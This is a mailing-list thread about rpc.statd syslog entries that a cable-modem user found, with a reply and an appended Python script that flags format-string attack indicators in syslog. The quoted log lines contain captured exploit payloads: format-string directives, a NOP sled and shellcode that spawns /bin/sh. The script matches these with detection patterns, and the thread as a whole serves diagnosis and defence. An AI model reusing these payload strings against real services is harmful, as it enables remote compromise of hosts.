
Re: Are these breakin attempts?




Yes, they are likely break-in attempts. Why in the *world* are you running rpc.statd (or portmap, or...nevermind...some people can't be helped) on a publicly accessible machine? That's flat out stupid.

Ken Seefried, CISSP

Christian Jaeger writes:
Hello, I run a PC with potato on a cable modem line. Recently I discovered the following in /var/log/messages:

Jun 10 20:21:16 pflanze -- MARK --
Jun 10 20:33:55 pflanze
Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\
Jun 10 20:33:55 pflanze Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 10 21:01:16 pflanze -- MARK --
Jun 11 13:41:16 pflanze -- MARK --
Jun 11 13:47:10 pflanze
Jun 11 13:47:10 pflanze /sbin/rpc.statd[229]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\
Jun 11 13:47:10 pflanze Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 11 14:01:16 pflanze -- MARK --
Jun 12 09:01:16 pflanze -- MARK --
Jun 12 09:09:47 pflanze
Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220
Jun 12 09:09:47 pflanze Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 12 09:21:16 pflanze -- MARK --

Seems like a buffer overflow. (Is it happening in rpc.statd or in named or somewhere else?)

I've now removed nfs-common && nfs-server. (BTW, there's still a daemon running (portmap, from netbase) on the sunrpc port - I thought sunrpc is only (mainly?) for NFS?)

After that I've installed ippl, which gives some interesting output as well:

Jun 17 04:13:24 asp connection attempt from ACBDC962.ipt.aol.com [172.189.201.98]
Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com [66.66.4.173]
Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com [66.66.4.173]
Jun 17 11:04:36 webcache connection attempt from ppp45-net1-idf2-bas1.isdnet.net [195.154.50.45]
Jun 17 18:14:47 sunrpc connection attempt from h24-79-83-253.vc.shawcable.net [24.79.83.253]
Jun 17 18:17:07 sunrpc connection attempt from skola8.zakladni-skola.cz [62.168.55.246]
Jun 18 00:07:26 port 445 connection attempt from 62.2.179.7
Jun 18 00:07:26 port 445 connection attempt from  [62.2.179.7]
Jun 18 00:07:27 port 445 connection attempt from [62.2.179.7]

Now when I think about it, these will probably all be harmless (maybe others on this cable modem subnet were serving stuff when they had my IP). If yes, please excuse my anxiety.

.christian.
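The rpc.statd lines quoted above are the typical footprint of a printf-style format-string attack delivered through the hostname argument: a run of width-padded `%8x` reads, `%n`/`%hn` directives (the only printf directives that write to memory), a sled of 0x90 bytes that syslog renders as `\220`, and a `/bin/sh` string split across two 4-byte stores on the following line. The following is an added example, not code from the thread or from Debian, showing how a defender could scan /var/log/messages for that footprint so the events stand out among the `-- MARK --` noise. The sample log is constructed from the shape of the quoted lines with the payload abbreviated; the thresholds (eight NOP bytes, four padded reads) are assumptions chosen to keep ordinary lookups of odd hostnames from being flagged.

```python
"""Flag format-string exploitation attempts in syslog entries logged by rpc.statd."""
import re

# Constructed sample modelled on the lines quoted in the thread; payload bytes are
# abbreviated, and the "\220" runs are how syslog renders a sled of 0x90 bytes.
SAMPLE_LOG = r"""Jun 10 20:21:16 pflanze -- MARK --
Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for %8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220
Jun 10 20:33:55 pflanze Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200
Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for %8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220
Jun 12 09:09:48 pflanze /sbin/rpc.statd[229]: gethostbyname error for fileserver.example.internal
Jun 12 09:21:16 pflanze -- MARK --
"""

# Classic syslog line: "Mon DD HH:MM:SS host message".
SYSLOG_RE = re.compile(r'^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<msg>.*)$')
# The statd message whose trailing argument is attacker-supplied text.
STATD_RE = re.compile(r'rpc\.statd\[(?P<pid>\d+)\]: gethostbyname error for (?P<arg>.*)$')
WRITE_RE = re.compile(r'%\d*(?:ll|l|hh|h)?n')   # %n family: the only printf directives that write memory
PADDED_RE = re.compile(r'%\d+[xXdu]')           # width-padded reads used to walk the stack and tune the byte count
NOP_RE = re.compile(r'(?:\\220){8,}')           # eight or more 0x90 bytes as syslog escapes them (assumed threshold)
SHELL_RE = re.compile(r'/bin.{0,4}/sh')         # "/bin/sh" split across two 4-byte stores, as in the quoted lines


def analyze_line(line):
    """Return a finding dict for one syslog line, or None if it is not syslog-shaped."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    msg = m.group('msg')
    finding = {'timestamp': m.group('ts'), 'host': m.group('host'),
               'pid': None, 'indicators': []}
    s = STATD_RE.search(msg)
    # Inspect the lookup argument when present; a continuation line without a
    # program prefix (as in the thread) can still carry the rest of a payload.
    text = s.group('arg') if s else msg
    if s:
        finding['pid'] = int(s.group('pid'))
    writes = WRITE_RE.findall(text)
    if writes:
        finding['indicators'].append(f'{len(writes)} memory-writing %n directive(s)')
    padded = PADDED_RE.findall(text)
    if len(padded) >= 4:  # assumed threshold: a hostname never needs four padded reads
        finding['indicators'].append(f'{len(padded)} width-padded read directives')
    if NOP_RE.search(text):
        finding['indicators'].append('NOP sled (run of 0x90 bytes)')
    if SHELL_RE.search(text):
        finding['indicators'].append('embedded /bin/sh string')
    finding['suspicious'] = bool(finding['indicators'])
    return finding


def scan_log(text):
    """Return findings for every suspicious line, in file order."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f and f['suspicious']]


def summarize(findings):
    """Count suspicious events per (host, pid) so a repeatedly hit daemon stands out."""
    counts = {}
    for f in findings:
        key = (f['host'], f['pid'])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h['timestamp'], h['host'], h['pid'], '; '.join(h['indicators']))
    print(summarize(hits))
```

Run against a real /var/log/messages, the `summarize` output answers the question posed in the thread: the pid in every flagged line is the rpc.statd process, so the lookup argument is reaching that daemon, not named. The legitimate `gethostbyname error for fileserver.example.internal` line produces no indicators and is left alone.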




